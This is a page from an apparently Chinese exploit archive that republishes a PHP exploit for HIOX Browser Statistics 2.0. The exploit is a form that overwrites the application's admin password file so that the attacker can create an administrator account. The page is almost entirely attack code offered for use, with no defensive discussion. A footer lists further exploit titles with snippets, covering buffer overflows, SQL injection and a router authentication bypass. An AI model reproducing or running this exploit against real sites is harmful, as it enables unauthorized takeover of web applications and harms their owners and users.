HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit

所属分类: 网络安全 / Exploit 阅读数: 138
收藏 0 赞 0 分享
<?php
@session_start();
?>
<table align=center width=72% height=95% ><tr><td>
<?php
/*
HIOX Browser Statistics 2.0 Arbitrary Add Admin User Vulnerability
[~] Discoverd & exploited by Stack
[~]Greeatz All Freaind
[~]Special thnx to Str0ke
[~] Name Script : HIOX Browser Statistics 2.0
[~] Download : http://www.hscripts.com/scripts/php/downloads/HBS_2_0.zip
You need to change http://localhost/path/ with the link of script it's very importent
*/
$creat = "true";
$iswrite = $_POST['createe'];
if($user=="" && $pass==""){
if($iswrite == "creatuser")
{
$usname = $_POST['usernam'];
$passwrd = md5($_POST['pword']);
if($usname != "" && $passwrd != ""){
$filee = "http://localhost/path/admin/passwo.php";
$file1 = file($filee);
$file = fopen($filee,'w');
fwrite($file, "<?php \n");
fwrite($file, "$");
fwrite($file, "user=\"$usname\";\n");
fwrite($file, "$");
fwrite($file, "pass=\"$passwrd\";");
fwrite($file, "\n?>");
fclose($file);
$creat = "false";
echo "<div align=center style='color: green;'><b>New User Created
<meta http-equiv=\"refresh\" content=\"2; url=http://localhost/path/admin/index.php\">
<br>Please Wait You will be Redirected to Login Page
</div>";
}
else{
echo "<div align=center style='color: red;'><b>Enter correct Username or Password </div>";
}
}
if($creat == "true"){
?>
<table align=center valign=center bgcolor=000000 align=center cellpadding=0 style="border: 1px #000000 solid;">
<tr width=400 height=20><td align=center bgcolor="000000"
style="color: ffffff; font-family: arial,verdana,san-serif; font-size:13px;">
Create New User </td></tr>
<tr width=400 height=20><td>
<form name=setf method=POST action=<?php echo $PHP_SELF;?>>
<table style="color:#ffffff; font-family: arial,verdana,san-serif; font-size:13px;">
<tr><td>User Name</td><td><input class="ta" name="usernam" type=text maxlength=20 >
</td></tr>
<tr><td>Password</td><td><input class="ta" name="pword" maxlength=20 type=password></td></tr>
<input name="createe" type=hidden value="creatuser"></td></tr>
<tr><td></td><td><input type=submit value="create"></td></tr>
</table>
</form>
</td></tr></table>
<?php
}
}else{
echo "<div align=center style='color: red;'><b>User Already Exist</div>";
}
?>
</td></tr></table>

更多精彩内容其他人还在看

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

----------------------------------------------------------------------------- Ultra Office ActiveX Control Remote Arbitrary File Corruptio
收藏 0 赞 0 分享

Dana IRC 1.4a Remote Buffer Overflow Exploit

#!/usr/bin/perl # k`sOSe - 08/24/2008 # This is a useless and not portable exploit code, tested only on my winxp-sp3 VM. # I was loo
收藏 0 赞 0 分享

GeekLog

#!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; print <<INTRO;
收藏 0 赞 0 分享

NoName Script

################################################################################ [ ] NoName Script 1.1 BETA Multiple Remote Vulnerabiliti
收藏 0 赞 0 分享

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print "
收藏 0 赞 0 分享

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

<html> <head> </head> <body> <b>html code to bypass the webinterface password protection of the Be
收藏 0 赞 0 分享

Download Accelerator Plus - DAP 8.6 (AniGIF.ocx) Buffer Overflow PoC

<html> <body> <object classid='clsid:82351441-9094-11D1-A24B-00A0C932C7DF' id='target' /> </o
收藏 0 赞 0 分享

BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit

#!/usr/bin/perl # # Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC) # # Summary: BlazeDVD is leading
收藏 0 赞 0 分享

Sun xVM VirtualBox

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurit
收藏 0 赞 0 分享

Discuz! 6.0.1 (searchid) Remote SQL Injection Exploit

<?php error_reporting(E_ALL&E_NOTICE); print_r(" ------------------------------------------------------------------ Exploi
收藏 0 赞 0 分享
查看更多